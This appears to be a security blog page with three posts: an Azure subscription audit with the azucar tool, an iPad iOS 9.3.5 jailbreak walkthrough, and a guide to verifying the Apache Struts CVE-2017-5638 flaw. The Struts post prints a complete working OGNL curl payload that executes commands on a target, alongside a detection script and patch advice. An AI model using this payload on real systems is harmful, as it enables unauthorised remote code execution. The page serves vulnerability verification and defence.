Tuesday, September 17, 2019

Azure configuration Check (part 1)

Part 1: Use azucar tool

Azucar is a multi-threaded, plugin-based tool that helps assess the security of an Azure Cloud subscription. By leveraging the Azure API, Azucar automatically gathers a variety of configuration data and analyses everything relating to a particular subscription in order to determine security risks.

The script will not change or modify any asset deployed in the Azure subscription.
More details on https://github.com/nccgroup/azucar/

Requirements:

  1. Windows 10, 1903
  2. An Azure read-only account
  3. Excel 2016, if you want to export the report in Excel format

Steps:

  1. Download and install Git for Windows from https://gitforwindows.org/ using the default options. If you already have git installed on your system, you can skip this step.
  2. Open a command prompt, change to the folder where you want the tool to live, and run: git clone https://github.com/nccgroup/azucar.git
  3. Open a PowerShell window as administrator and change to the “azucar” folder.
  4. Run “$psversiontable” and make sure the PowerShell version is 3.x.
  5. Run “Get-ChildItem -Recurse c:\tools\azucar | Unblock-File” to unblock the downloaded files (adjust the path to wherever you cloned the repository).
  6. Run “.\Azucar.ps1 -ExportTo EXCEL,CSV,XML,JSON -Verbose -Instance AzureCloud -Analysis All”. A window will pop up asking you to sign in.
  7. Enter the Azure email address and password and click the “Sign in” button. Select the subscription and click the “OK” button.
  8. Wait until the analysis has finished; the reports are in the “azucar\report” folder.

References:

  1. https://github.com/nccgroup/azucar/
  2. https://gitforwindows.org/


Friday, August 11, 2017

iPad mini 1 ios 9.3.5 Phoenix Jailbreak

Environment:
1. iPad mini 1: A1432; iOS version 9.3.5
2. Kali Linux 2017.1 (64-bit)

Steps:
1. Download Cydia Impactor from http://www.cydiaimpactor.com/ and unzip it. What I used was the Linux 64-bit version. (pic01)

2. Download the IPA file Phoenix3.ipa from https://phoenixpwn.com/download.php and put it in the unzipped folder (Impactor64_0.9.41). (pic02)

3. Check the hash of the IPA file. It should be "616ef9da4796ae7d490fb7b0e31cd85bb48e2732d2436c7710e79716e2b80e61" (pic03)

4. Connect the iPad mini 1 to Kali Linux. You should see the iPad icon on the desktop. (pic04)

5. Double-click "Impactor". The device should be loaded automatically. (pic05)

6. Click "Device" -> "Install Package..." (pic06)

7. Select "Phoenix3.ipa" and click "Open" (pic07)

8. Enter the Apple ID and password. (pic08)

9. The installation will start. (pic09)

10. If you get the error "Provision.cpp:81, ios/submitDevelopmentCSR = 7460 You already have a current iOS Development certificate or a pending certificate request" (pic10), click "Xcode" -> "Revoke Certificate". (pic10-2)

11. After the installation is done, you should see the Phoenix icon on your iPad. (pic11)


12. Go to "Settings > General > Device Management" and trust the certificate. (pic12)

13. Run the app and tap "Prepare For Jailbreak". Follow the on-screen instructions to install Cydia. (pic13)

14. Now you can run Cydia. (pic14)


Please note:
1. Whenever you reboot, open the app again and tap on "Kickstart Jailbreak".
2. Whenever the app expires, install it again with Cydia Impactor.

References:
1. https://phoenixpwn.com/

Friday, July 21, 2017

How to verify CVE-2017-5638 Apache Struts Jakarta Multipart Parser RCE

1. Nessus Description

The version of Apache Struts running on the remote host is affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type header. An unauthenticated, remote attacker can exploit this, via a specially crafted Content-Type header value in the HTTP request, to potentially execute arbitrary code, subject to the privileges of the web server user.


2. Example of the vulnerable link

1) https://x.x.x.x:8443/service/login.action


3. Verification Steps

1) The command below returns the output of ifconfig (or ipconfig /all on a Windows host) from the remote host, which confirms that the OGNL expression in the Content-Type header was evaluated:
curl --header "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','ipconfig','/all'}:{'bash','-c','ifconfig'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" https://x.x.x.x:8443/service/login.action  --insecure
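
The payload above is recognisable from the Content-Type header alone, which makes it straightforward to flag in reverse-proxy or WAF logs. The following Python is an added example and not part of the original post: it classifies Content-Type values by the OGNL markers the public proof of concept relies on, and scans constructed log lines in a hypothetical format (timestamp, client, method, path, quoted header).

```python
import re
from typing import Iterable, List, Tuple

# Tokens that never appear in a legitimate Content-Type value but do appear in the
# OGNL payloads that hit the Jakarta Multipart parser (CVE-2017-5638 / S2-045).
OGNL_MARKERS = (
    "%{",                                       # OGNL expression opener
    "#_memberAccess",                           # sandbox-bypass handle in public payloads
    "ognl.OgnlContext",
    "@java.lang.",                              # static method invocation
    "ProcessBuilder",
    "@org.apache.struts2.ServletActionContext@",
)

# RFC 7231 shape: type/subtype followed by optional ";name=value" parameters.
MEDIA_TYPE = re.compile(r'^[\w.+-]+/[\w.+-]+(\s*;\s*[\w.-]+=("[^"]*"|[^;\s]*))*\s*$')

def classify_content_type(value: str) -> Tuple[bool, List[str]]:
    """Return (suspicious, reasons) for a single Content-Type header value."""
    lowered = value.lower()
    reasons = [m for m in OGNL_MARKERS if m.lower() in lowered]
    if not MEDIA_TYPE.match(value.strip()):
        reasons.append("malformed media type")
    return bool(reasons), reasons

# Hypothetical log format (constructed for this example): timestamp, client, method,
# path, then the Content-Type header exactly as a reverse proxy or WAF recorded it.
LOG_LINE = re.compile(r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<path>\S+) ct="(?P<ct>.*)"$')

def scan_log(lines: Iterable[str]) -> List[dict]:
    """Return one finding per request whose Content-Type looks like an S2-045 probe."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line.rstrip("\n"))
        if not m:
            continue  # not in the expected format; skip rather than guess
        suspicious, reasons = classify_content_type(m.group("ct"))
        if suspicious:
            findings.append({"client": m.group("client"), "path": m.group("path"), "reasons": reasons})
    return findings

# Constructed sample: two ordinary requests and one carrying the opening of the public
# S2-045 payload (truncated; the prefix alone is enough for detection).
SAMPLE_LOG = [
    '2017-07-21T10:15:01Z 198.51.100.7 POST /service/login.action ct="multipart/form-data; boundary=----abc123"',
    '2017-07-21T10:15:02Z 198.51.100.7 POST /service/login.action ct="application/x-www-form-urlencoded"',
    '2017-07-21T10:15:03Z 203.0.113.5 POST /service/login.action ct="%{(#_=\'multipart/form-data\').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):0)}"',
]
```

Calling scan_log(SAMPLE_LOG) yields a single finding for 203.0.113.5, with the matched markers listed under "reasons"; the malformed-media-type check also catches variants that rename the well-known handles.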
4. Metasploit module

1) exploit/multi/http/struts2_content_type_ognl (see reference 5 below)

5. Recommendation

1) Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later.
2) Alternatively, apply the workaround referenced in the vendor advisory.

6. References:

1) https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1
2) https://cwiki.apache.org/confluence/display/WW/S2-045
3) http://www.securityfocus.com/bid/96729
4) http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5638
5) https://www.rapid7.com/db/modules/exploit/multi/http/struts2_content_type_ognl